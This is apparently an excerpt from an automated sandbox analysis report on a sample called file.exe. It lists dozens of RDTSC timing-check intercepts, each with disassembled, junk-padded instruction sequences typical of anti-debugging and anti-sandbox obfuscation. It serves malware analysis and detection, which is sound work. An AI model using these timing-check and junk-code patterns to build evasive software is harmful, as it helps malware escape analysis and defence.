          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF313 second address: 5AF325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B44CB second address: 5B44D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B54A5 second address: 5B5526 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F37B4537098h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D356Eh], edx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F37B4537098h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F37B4537098h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov eax, dword ptr [ebp+122D06DDh] 0x0000005d sub ebx, 590A7652h 0x00000063 push FFFFFFFFh 0x00000065 add dword ptr [ebp+122D2159h], eax 0x0000006b nop 0x0000006c push eax 0x0000006d push edx 0x0000006e push esi 0x0000006f push esi 0x00000070 pop esi 0x00000071 pop esi 0x00000072 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B62EE second address: 5B62F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5526 second address: 5B552D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B738F second address: 5B73B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F37B4535CDDh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B8442 second address: 5B845D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F37B453709Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9212 second address: 5B9217 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B845D second address: 5B8461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD0A3 second address: 5BD0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD0A7 second address: 5BD0AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD630 second address: 5BD636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE568 second address: 5BE576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B453709Ah 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE576 second address: 5BE594 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F37B4535CE3h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE594 second address: 5BE61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F37B45370A1h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F37B4537098h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 xor dword ptr [ebp+122D195Ah], esi 0x0000002f pop ebx 0x00000030 mov bl, 78h 0x00000032 push 00000000h 0x00000034 call 00007F37B45370A8h 0x00000039 mov edi, ebx 0x0000003b pop edi 0x0000003c xchg eax, esi 0x0000003d jng 00007F37B45370AEh 0x00000043 pushad 0x00000044 jmp 00007F37B45370A4h 0x00000049 push eax 0x0000004a pop eax 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 pushad 0x00000051 popad 0x00000052 pop eax 0x00000053 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD88E second address: 5BD892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD892 second address: 5BD8AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F37B4537098h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007F37B4537096h 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE868 second address: 5BE89B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b js 00007F37B4535CE6h 0x00000011 jmp 00007F37B4535CE0h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF696 second address: 5BF69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C250B second address: 5C25D4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F37B4535CE1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F37B4535CE0h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F37B4535CD8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c xor dword ptr [ebp+122D20ACh], ebx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F37B4535CD8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e call 00007F37B4535CE4h 0x00000053 call 00007F37B4535CE2h 0x00000058 ja 00007F37B4535CD6h 0x0000005e pop edi 0x0000005f pop ebx 0x00000060 push 00000000h 0x00000062 jns 00007F37B4535CDCh 0x00000068 xchg eax, esi 0x00000069 push edi 0x0000006a push eax 0x0000006b jmp 00007F37B4535CDAh 0x00000070 pop eax 0x00000071 pop edi 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F37B4535CDBh 0x0000007a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C1600 second address: 5C160A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C160A second address: 5C160E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C160E second address: 5C1696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F37B45370A4h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F37B4537098h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 call 00007F37B453709Ch 0x0000002d pushad 0x0000002e xor esi, dword ptr [ebp+122D3A08h] 0x00000034 movsx edx, si 0x00000037 popad 0x00000038 pop edi 0x00000039 push dword ptr fs:[00000000h] 0x00000040 mov dword ptr [ebp+122D328Ah], edx 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d mov dword ptr [ebp+1244C01Ah], ebx 0x00000053 mov eax, dword ptr [ebp+122D0565h] 0x00000059 mov dword ptr [ebp+122D2DE6h], ebx 0x0000005f push FFFFFFFFh 0x00000061 mov ebx, dword ptr [ebp+122D396Ch] 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b push ebx 0x0000006c pop ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C1696 second address: 5C169B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C169B second address: 5C16C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F37B45370AFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B453709Dh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8DDD second address: 5C8E02 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B4535CE9h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8E02 second address: 5C8E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDBFE second address: 5CDC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B4535CDAh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDD83 second address: 5CDDA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDDA0 second address: 5CDDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDF15 second address: 5CDF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE099 second address: 5CE0B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5AC4 second address: 5D5ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D952C second address: 5D9532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B25 second address: 5D9B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B45370A1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9B3C second address: 5D9B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F37B4535CD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9B46 second address: 5D9B50 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F37B4537096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9C8A second address: 5D9CAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE6h 0x00000007 jmp 00007F37B4535CDBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9CAF second address: 5D9CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9CC3 second address: 5D9CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DA289 second address: 5DA294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F37B4537096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DA3E0 second address: 5DA3F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F37B4535CD6h 0x0000000a jng 00007F37B4535CD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DA3F0 second address: 5DA3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DA6CC second address: 5DA6D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DF34B second address: 5DF375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A0h 0x00000007 jmp 00007F37B453709Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007F37B4537096h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DF375 second address: 5DF37B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DF37B second address: 5DF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3989 second address: 5E39CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE5h 0x00000007 jc 00007F37B4535CDCh 0x0000000d jng 00007F37B4535CD6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F37B4535CE4h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E39CA second address: 5E39E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B45370A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AFC29 second address: 5AFC9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F37B4535CE8h 0x00000010 jmp 00007F37B4535CDAh 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F37B4535CD8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 lea eax, dword ptr [ebp+124869D2h] 0x00000037 mov dword ptr [ebp+122D2326h], eax 0x0000003d nop 0x0000003e pushad 0x0000003f push eax 0x00000040 jc 00007F37B4535CD6h 0x00000046 pop eax 0x00000047 jo 00007F37B4535CDCh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AFC9C second address: 5AFCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AFCA7 second address: 5AFCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AFCAB second address: 5AFCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F37B4537096h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AFE8F second address: 5AFEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CE1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B01F6 second address: 5B0204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jng 00007F37B4537096h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0338 second address: 5B033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B033C second address: 5B034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B034C second address: 5B0351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0488 second address: 5B048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0566 second address: 5B059B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F37B4535CE0h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 jnl 00007F37B4535CDCh 0x0000001a jg 00007F37B4535CD6h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B059B second address: 5B059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B059F second address: 5B05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B079D second address: 5B07A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B07A1 second address: 5B07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B07A7 second address: 5B07AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B07AD second address: 5B07B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B07B1 second address: 5B07C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F37B453709Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B07C3 second address: 5B07DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F37B4535CE5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0F32 second address: 5B0F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F37B4537098h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sbb dx, D0F1h 0x0000002c lea eax, dword ptr [ebp+12486A16h] 0x00000032 call 00007F37B45370A1h 0x00000037 jmp 00007F37B453709Ch 0x0000003c pop edx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0F8F second address: 591331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F37B4535CD6h 0x00000009 jmp 00007F37B4535CDFh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F37B4535CD8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e call 00007F37B4535CE8h 0x00000033 jns 00007F37B4535CE6h 0x00000039 pop ecx 0x0000003a lea eax, dword ptr [ebp+124869D2h] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F37B4535CD8h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a push eax 0x0000005b push edi 0x0000005c jmp 00007F37B4535CDBh 0x00000061 pop edi 0x00000062 mov dword ptr [esp], eax 0x00000065 or edx, 05421700h 0x0000006b call dword ptr [ebp+122D3389h] 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jo 00007F37B4535CD6h 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 591331 second address: 591335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 591335 second address: 591339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 591339 second address: 59134E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d je 00007F37B4537098h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2A1E second address: 5E2A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F37B4535CDEh 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F37B4535CD6h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2A36 second address: 5E2A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2FC8 second address: 5E2FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2FDE second address: 5E3030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F37B4537096h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F37B45370B3h 0x00000014 jmp 00007F37B45370A7h 0x00000019 jng 00007F37B4537096h 0x0000001f jbe 00007F37B45370B1h 0x00000025 jmp 00007F37B45370A5h 0x0000002a jnp 00007F37B4537096h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3030 second address: 5E3035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
